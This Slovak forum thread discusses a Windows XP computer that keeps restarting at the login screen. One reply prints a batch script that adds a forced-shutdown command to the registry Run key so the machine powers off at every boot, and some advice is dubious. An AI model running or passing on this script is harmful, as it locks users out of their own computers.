pri starte Win Xp Pro sa mi restartuje pocitac. HELP!

Informácie o software, ankety...
Smoake
Star
Star
Používateľov profilový obrázok
Kontaktovať používateľa:

pri starte Win Xp Pro sa mi restartuje pocitac. HELP!

Príspevok od používateľa Smoake »

pls potrebujem pomoc, pri zapnuti pocitaca sa mi pri nabiehani loggovacej obrazovky restartuje pocitac a toto mi robi stale dokola az mi neostava nic ine ako re-instal Win. :?: :?: :?: poradte co s tym moze byt, dakujem
Digital6
Light Star
Light Star

Re: pri starte Win Xp Pro sa mi restartuje pocitac. HELP!

Príspevok od používateľa Digital6 »

Smoake napísal:pls potrebujem pomoc, pri zapnuti pocitaca sa mi pri nabiehani loggovacej obrazovky restartuje pocitac a toto mi robi stale dokola az mi neostava nic ine ako re-instal Win. :?: :?: :?: poradte co s tym moze byt, dakujem
aj ja som mal taky problem ale cim to mohlo byt tak newem....podla mna preinstaluj win a mash to vybavene...ale ked necesh o nic z kompu prist tak si nastav nech ti nic nevymaze pri instalacii
..::PEaCe::..
Smoake
Star
Star
Kontaktovať používateľa:

Digital6 napísal:aj ja som mal taky problem ale cim to mohlo byt tak newem....podla mna preinstaluj win a mash to vybavene...ale ked necesh o nic z kompu prist tak si nastav nech ti nic nevymaze pri instalacii
..::PEaCe::..
a ako mam spravit aby sa mi nic nevymazalo???
dudinko
Light Professional
Light Professional
Kontaktovať používateľa:

Príspevok od používateľa dudinko »

Smoake napísal:a ako mam spravit aby sa mi nic nevymazalo???
Co myslis pod pojmom "nic nevymazalo"? Ak mas na mysli mp3, dokumenty, filmy a pod tak bud si vsetko ponapalujes alebo das to na druhy disk (ja to volam zalozny, alebo zalohovaci). Tak to mam rozdelene aj ja na C mam vsetky programy a veci ktore sa len instaluju a na D mam hudbu, filmy, dvolezite dokumenty e-booky a pod. C mozem formatovat kedy chcem a instalovat na neho Win a z D-ecka mazem len nepotrebne veci.

//Edit: A este ma napadlo ze co ak to nieje chyba v soft ale v HDW? Skus vybrat disk (dvolezite slovo disk) k neakemu kamarativo a tam ho zapojit... Skus ci nabehne Win bez problemov. Ak hej, tak mas bud chybnu ramku, slaby zdroj... dvovodov je vela.
Digital6
Light Star
Light Star

Príspevok od používateľa Digital6 »

Aky win mash??nemash cesky abo slovensky bo ja to mam po cesky a tak iba citam a klikam po anglicky to newem :?
brm
Darca
Darca

Príspevok od používateľa brm »

Ani do núdzového režimu sa nevieš dostať?
Bobr
Guru
Guru

Príspevok od používateľa Bobr »

Mne to tiez robilo ale ja som mal vtedy pokazenu maticnu dosku... a vtedy mi to restartovavalo sem tam pri restarte a sem tam pri nejakej narocnejsej operacii. :?
IMI
Addict
Addict
Kontaktovať používateľa:

Príspevok od používateľa IMI »

moze to byt cmdline skript,jeden typek to pisal pockaj dam ti link o co sa jedna , tu to je http://www.soom.cz/index.php?name=usert ... ow&aid=383
dudinko
Light Professional
Light Professional
Kontaktovať používateľa:

Príspevok od používateľa dudinko »

IMI napísal:moze to byt cmdline skript,jeden typek to pisal pockaj dam ti link o co sa jedna , tu to je http://www.soom.cz/index.php?name=usert ... ow&aid=383
Neviem ci som tak sprosty, ale nikde som tam nevidel prikaz na restartovanie pc...
IMI
Addict
Addict
Kontaktovať používateľa:

dudo otvoris wordpad na napises

2. příkaz restartuje počítač při každém spuštění winu:

echo off
echo Windows Registry Editor Version 5.00o > %homedrive%\windows\z.reg
echo.>> %homedrive%\windows\z.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\z.reg
echo "system_tray"="shutdown -s -f -t 0" >> %homedrive%\windows\z.reg
reg import %homedrive%\windows\z.reg

toto ulozis do *.cmd a spustis len to nerob lebo ti to bude robit take iste haluze ako autorovi tjeto temy.
Šu-Do
Redeemer
Redeemer
Kontaktovať používateľa:

Príspevok od používateľa Šu-Do »

IMI napísal:dudo otvoris wordpad na napises
...
toto ulozis do *.cmd a spustis len to nerob lebo ti to bude robit take iste haluze ako autorovi tjeto temy.
a ako sa to potom da vypnut ?? :?
IMI
Addict
Addict
Kontaktovať používateľa:

sak toto toto prave skusam nieco co ma napadlo pre kamarata lebo jemu to robi to iste ked na to pridem , napiiiisem
cor72z
Medium Expert
Medium Expert

Príspevok od používateľa cor72z »

Smoake napísal:pls potrebujem pomoc, pri zapnuti pocitaca sa mi pri nabiehani loggovacej obrazovky restartuje pocitac a toto mi robi stale dokola az mi neostava nic ine ako re-instal Win. :?: :?: :?: poradte co s tym moze byt, dakujem
HMMM ale presne to opis co sa deje . ja som mal stejny problem mne to robilo tak ze v prihlasovacej obrazovke ked som bol rychli tak som sa este prihlasil ale hned mi to restartlo . OTAZKA ZNIE INSTALOVAL SI PREDTYM NEJAKY OVLADAC NA NIECO NAPR na BLUEttooth alebo web kamera alebo nieco ??????
krija
VIP
VIP
Kontaktovať používateľa:

Príspevok od používateľa krija »

dudinko napísal:A este ma napadlo ze co ak to nieje chyba v soft ale v HDW? Skus vybrat disk (dôlezite slovo disk) k neakemu kamaratovi a tam ho zapojit... Skus ci nabehne Win bez problemov. Ak hej, tak mas bud chybnu ramku, slaby zdroj... dôvodov je vela.
prosim ta, toto ta ako napadlo? s tym HDD. na inom PC sa na 99,99% z toho disku operacny system nespusti.
xH4wK

Príspevok od používateľa xH4wK »

Mne to robila najprv nova grafika karta... ked som mal RIVA tuner nastaveny pre inu...
A potom mi to robil HDD ... takze odporucam nieco robit z HDD
Smoake
Star
Star
Kontaktovať používateľa:

dudinko napísal:Co myslis pod pojmom "nic nevymazalo"? Ak mas na mysli mp3, dokumenty, filmy a pod tak bud si vsetko ponapalujes alebo das to na druhy disk (ja to volam zalozny, alebo zalohovaci). Tak to mam rozdelene aj ja na C mam vsetky programy a veci ktore sa len instaluju a na D mam hudbu, filmy, dvolezite dokumenty e-booky a pod. C mozem formatovat kedy chcem a instalovat na neho Win a z D-ecka mazem len nepotrebne veci.

//Edit: A este ma napadlo ze co ak to nieje chyba v soft ale v HDW? Skus vybrat disk (dvolezite slovo disk) k neakemu kamarativo a tam ho zapojit... Skus ci nabehne Win bez problemov. Ak hej, tak mas bud chybnu ramku, slaby zdroj... dvovodov je vela.
mam Win professional service pack 3 en, zdroj 400W maxpower ram 1GB AM1, HDD:160GB Maxtor a 320GB WD, MB ma ani nie rok, takze neviem v com moze byt problem.A nemusis mi vysvetlovat take samozrejmosti ako neprist o data ulozene na disku, inac dakujem
killa_bee
Star
Star

Príspevok od používateľa killa_bee »

Neda mi nerypnut, an Win XP neexistuje SP3
Smoake
Star
Star
Kontaktovať používateľa:

brm napísal:Ani do núdzového režimu sa nevieš dostať?
do nudzoveho rezimu sa viem dostat, po tom restarte sa ma spyta comp ci chcem spustit win normalne alebo v safe mode alebo ...
cor72z napísal:HMMM ale presne to opis co sa deje . ja som mal stejny problem mne to robilo tak ze v prihlasovacej obrazovke ked som bol rychli tak som sa este prihlasil ale hned mi to restartlo . OTAZKA ZNIE INSTALOVAL SI PREDTYM NEJAKY OVLADAC NA NIECO NAPR na BLUEttooth alebo web kamera alebo nieco ??????
Dam zapnut Win Pro sevice pack 3 zacne nabiehat bootscreen ked skonci mala by sa zbrazit spustacia obrazovka s vsetkymi uzivatelmi ale to sa nestane prave vtedy sa mi restartuje comp a potom sa mi automaticky restartuje a napise obrazovku ze daky problem s Win a pyta sa co chcem robit ci spustit win normalne alebo v sefe mode alebo ...

nabuduce pouzi upravit a nepis 2 prispevky hned pod seba ...
/ob3l1x
xH4wK

Príspevok od používateľa xH4wK »

Ale CHAPES ZE SP3 NEEXISTUJE ?
Asi si stiahol nejaky zavirovanu piratsku verziu neexistujuceho SP3 a preto to robi...
No nieze asi ale urcite
marek63
Medium Star
Medium Star
Kontaktovať používateľa:

Príspevok od používateľa marek63 »

HMM vidim že sa do toho asi moc nevyznaš.. jednoducho to treba cez BIOS reinstalovať daj to nejakemu kamaratovi čo sa trochu vyzna.. neboj sa nič nestratiš ked to iba reinstaluje.. :wink:
Napísať odpoveď